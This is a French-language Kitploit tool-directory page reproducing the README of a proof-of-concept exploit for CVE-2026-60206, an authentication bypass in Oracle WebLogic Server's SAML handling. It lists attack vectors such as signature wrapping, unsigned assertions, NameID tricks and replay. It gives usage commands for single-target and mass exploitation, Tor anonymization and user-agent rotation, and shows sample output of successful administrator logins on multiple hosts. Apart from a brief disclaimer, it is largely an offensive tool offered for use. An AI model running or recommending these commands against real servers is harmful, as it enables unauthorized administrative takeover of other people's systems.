Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-60206 — Analyse technique et preuve de concept (Proof-of-Concept) pour CVE-2026-60206, une vulnérabilité critique de contournement de l'authentification SAML sur Oracle WebLogic Server. | Kitploit
Outils/GitHubGitHub/debajyoti0-0/cve-2026-60206
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentification
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

Analyse technique et preuve de concept (Proof-of-Concept) pour CVE-2026-60206, une vulnérabilité critique de contournement de l'authentification SAML sur Oracle WebLogic Server.

Voir le dépôt
il y a 26 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-60206 – PoC de contournement de l'authentification SAML d'Oracle WebLogic Server

Ce dépôt fournit un exploit de preuve de concept pour CVE‑2026‑60206, une vulnérabilité critique de contournement de l'authentification dans l'implémentation SAML d'Oracle WebLogic Server. Cette faille permet à un attaquant distant disposant de faibles privilèges de compromettre entièrement le serveur en forgeant des assertions SAML.

CVSS

⚠️ Avertissement : Cet outil est destiné uniquement à la recherche et aux tests de sécurité autorisés. Ne l'utilisez que sur des systèmes qui vous appartiennent ou pour lesquels vous disposez d'une autorisation explicite de test. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.

CVE-2026-60206 Logo

🔥 Présentation de la vulnérabilité

CVE-2026-60206 affecte le composant Core d'Oracle WebLogic Server. La vulnérabilité provient d'une gestion incorrecte de l'authentification dans l'implémentation du protocole SAML. De multiples vecteurs d'attaque – tels que l'enveloppement de signature XML (XSW), l'acceptation d'assertions non signées, la manipulation du NameID et le contournement des restrictions d'audience/conditions – permettent à un attaquant d'usurper l'identité d'utilisateurs arbitraires (par exemple weblogic) et d'obtenir un accès administratif.

Versions concernées :

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

Le PoC implémente les vecteurs d'attaque suivants :

  • Enveloppement de signature XML (XSW) – manipulation structurelle visant à faire accepter une assertion non signée par le processeur SAML.
  • Injection d'assertion non signée – générer une réponse SAML entièrement non signée (si WantAssertionsSigned n'est pas appliqué).
  • Manipulation du NameID – dérouter le mappeur d'identités via des commentaires XML, des espaces ou une confusion de format.
  • Contournement de la restriction d'audience – supprimer ou modifier AudienceRestriction pour élargir la portée.
  • Contournement des conditions/périodes – manipuler NotBefore/NotOnOrAfter pour contourner les contrôles de validité.
  • Attaque combinée – XSW + assertion interne non signée + manipulation du NameID (la plus susceptible de réussir).
  • Rejeu – rejouer une réponse SAML capturée avec une destination/un destinataire modifiés.

✨ Fonctionnalités

  • Plusieurs modes d'attaque – choisir parmi all, unsigned, xsw, nameid, audience, conditions, combo ou replay.
  • Scan de masse – détection simultanée et exploitation facultative sur de nombreuses cibles (via -l).
  • Détection de version – identifier avec précision la version de WebLogic via les en-têtes, les pages d'erreur et le WSDL.
  • Sondage des points de terminaison SAML – découvrir automatiquement les points de terminaison ACS, de métadonnées et initiés par le fournisseur de services.
  • Support de Tor – acheminer le trafic via Tor (SOCKS5/HTTP/SOCKS4) pour l'anonymat.
  • Rejeu de requêtes HTTP brutes – envoyer des requêtes HTTP brutes arbitraires depuis un fichier (-r).
  • Support HTTP/2 – utilise automatiquement httpx s'il est installé, sinon (HTTP/1.1).

📦 Installation

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

Requis : requests, urllib3

Facultatif (améliore les fonctionnalités) :

  • httpx – pour le support HTTP/2
  • lxml – pour une analyse SAML améliorée
  • signxml, cryptography – pour la gestion des signatures (non requis pour l'exploitation)

🚀 Utilisation

Cible unique – détection uniquement

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

Cible unique – exécuter tous les vecteurs d'attaque

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

Cible unique – mode d'attaque spécifique

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

Scan de masse – détecter les versions depuis un fichier

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

Scan de masse – détection + exploitation

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

Rejouer une réponse SAML capturée

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

Utiliser Tor et vérifier la connectivité

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

Envoyer une requête HTTP brute depuis un fichier

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

Vérification rapide de vulnérabilité (sans exploitation)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ Référence des options

Options :

Cible :

OptionDescription
-t, --target TARGETURL d'une cible unique (par ex., https://host:7002).
-l, --list LIST

Options de requête :

Configuration de l'attaque :

Scan de masse (avec -l) :

OptionDescription
--exploitTeste l'assertion SAML non signée (défaut : détection uniquement).
-T, --threads THREADSThreads simultanés (défaut : 10).

Sortie :

OptionDescription
-v, --verboseAugmente la verbosité (sortie de débogage).

🧪 Modes en détail

detect

Effectue la détection de version et le sondage des points de terminaison SAML. Aucune attaque n'est lancée.

unsigned

Injecte une assertion SAML entièrement non signée. Si la cible n'applique pas WantAssertionsSigned, cela contourne entièrement l'authentification.

Variantes : unsigned (défaut), unsigned_stripped (supprime toutes les références de signature).

xsw (enveloppement de signature XML)

Place une assertion non signée malveillante avant (ou en enveloppant) une assertion signée valide. Le processeur SAML peut sélectionner la première assertion tandis que le validateur de signature vérifie celle qui est signée.

Variantes : xsw1 (préfixe simple), xsw2 (même ID que l'originale), xsw3 (enveloppe imbriquée), xsw4 (nœud frère).

nameid

Manipule le champ NameID pour dérouter le mappeur d'identités de WebLogic, permettant d'usurper l'identité d'un autre utilisateur.

Variantes : comment_injection, whitespace, format_confusion, xpath_injection.

audience

Contourne les contrôles AudienceRestriction en supprimant ou en modifiant l'élément d'audience.

Variantes : remove_audience, wildcard_audience, extra_audience.

conditions

Contourne les restrictions temporelles (par ex., NotBefore, NotOnOrAfter).

Variantes : future_timestamp, expired_timestamp, remove_conditions, infinite_validity.

combo

Combine l'XSW, l'assertion non signée et la manipulation du NameID dans une seule charge utile – le vecteur le plus susceptible de mener à une compromission totale.

Variantes : combo_full (avec injection de commentaires), combo_stealth (avec saut de ligne).

replay

Rejoue une réponse SAML précédemment capturée, en modifiant éventuellement la destination ou en supprimant les restrictions d'audience.

Variantes : replay_modified (ajuste la destination/le destinataire), replay_cross_sp (supprime les restrictions d'audience).

📝 Exemple de flux de travail (exploitation d'une cible unique)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 Exemple de flux de travail (scan de masse)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ Construction d'un environnement de test vulnérable

Pour tester ce PoC en toute sécurité, configurez un serveur WebLogic avec SAML activé et l'une des versions concernées. Par exemple, vous pouvez utiliser Docker :

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

La configuration SAML doit inclure au moins un fournisseur de services SAML 2.0 avec un point de terminaison ACS (par ex., /saml2/sp/acs) et des métadonnées publiées.

🔗 Références

  • Avis de mise à jour critique d'Oracle de juillet 2026
  • Détail de CVE-2026-60206 – NIST NVD
  • CWE-287 : Authentification incorrecte
  • Analyse de sécurité SAML 2.0 – Enveloppement de signature XML

📜 Licence

Ce projet est sous licence GNU v3.0 – consultez le fichier LICENSE pour plus de détails.

🤝 Contribution

Les signalements de problèmes (issues) et les demandes de fusion (pull requests) sont les bienvenus. Veuillez vous assurer que vos contributions respectent les mêmes directives d'utilisation éthique.

Rappel : Obtenez toujours une autorisation appropriée avant de tester un outil de sécurité. Restez éthique !

Télécharger l’outil
requests
  • Rotation du User‑Agent – utiliser un User‑Agent aléatoire ou personnalisé.
  • Support de proxy – envoyer toutes les requêtes via un proxy HTTP/SOCKS.
  • Personnalisation des requêtes – définir les délais d'expiration, les tentatives, les délais, désactiver les redirections et réessayer selon un motif regex.
  • Enregistrement des charges utiles – enregistrer les charges utiles SAML générées sur disque (--save-payloads).
  • Vérification de vulnérabilité (-c / --check) – déterminer rapidement si une cible est vulnérable (sans exploitation).
  • Rapports JSON/CSV – résultats structurés pour les scans de masse.
  • Journalisation verbose – sortie de débogage détaillée avec console colorée.
  • OptionDescription
    -h, --helpAffiche le message d'aide et quitte.
    --proxy PROXYURL du proxy (remplacée par --tor s'il est utilisé).
    --no-verifyDésactive la vérification du certificat SSL.
    --cookie COOKIECookie(s) de session (par ex., name=value; name2=value2).
    --auth AUTHIdentifiants d'authentification de base (USER:PASS).
    Fichier de liste de cibles pour un scan de masse, ou URL unique.
    -f, --file FILEAlias de --list.
    OptionDescription
    -r, --requestfile REQUESTFILECharge une requête HTTP brute depuis un fichier (remplace les attaques SAML).
    --method METHODMéthode HTTP à utiliser (pour une requête brute ou une requête unique ; défaut : GET).
    --random-agentUtilise un User‑Agent aléatoire de la liste intégrée.
    -A, --user-agent USER_AGENTValeur d'en-tête User‑Agent personnalisée.
    --torUtilise le réseau d'anonymat Tor (SOCKS5 par défaut).
    --tor-port TOR_PORTPort du proxy Tor (défaut : 9050).
    --tor-type {HTTP,SOCKS4,SOCKS5}Type de proxy Tor (défaut : SOCKS5).
    --check-torVérifie si Tor est correctement utilisé (quitte avec un verdict).
    --delay DELAYDélai en secondes entre chaque requête.
    --timeout TIMEOUTDélai d'expiration en secondes (défaut : 30).
    --retries RETRIESNombre de nouvelles tentatives en cas de délai d'expiration/d'erreurs (défaut : 3).
    --retry-on RETRY_ONRéessaie la requête si le contenu de la réponse correspond à une regex (par ex., 'captcha').
    -dr, --disable-redirectsDésactive le suivi des redirections HTTP.
    OptionDescription
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}Mode d'attaque (défaut : all).
    --detectDétecte uniquement la version de WebLogic et la configuration SAML (sans attaque).
    -c, --checkVérification rapide de vulnérabilité (détection uniquement, quitte avec un verdict).
    -u, --user USERUtilisateur cible à usurper (défaut : weblogic).
    --groups GROUPSGroupes à inclure dans l'assertion SAML (défaut : Administrators,Monitors).
    --issuer ISSUERIdentifiant d'entité de l'émetteur SAML.
    --audience AUDIENCEIdentifiant d'entité de l'audience SAML.
    --relay-state RELAY_STATEParamètre RelayState pour le POST SAML.
    --base64Encode en Base64 la réponse SAML dans le POST.
    --extra-attrs [NAME=VALUE ...]Attributs SAML supplémentaires (par ex., role=admin).
    --replay-file REPLAY_FILEChemin vers la réponse SAML capturée à rejouer.
    --save-payloadsEnregistre les charges utiles SAML générées dans ./payloads/.
    --continue-on-successPoursuit les tests après une attaque réussie.
    -q, --quiet
    Supprime la sortie non essentielle.
    --list-modesListe tous les modes d'attaque avec leurs descriptions, puis quitte.
    -o, --output OUTPUTÉcrit un rapport JSON ou CSV dans un fichier.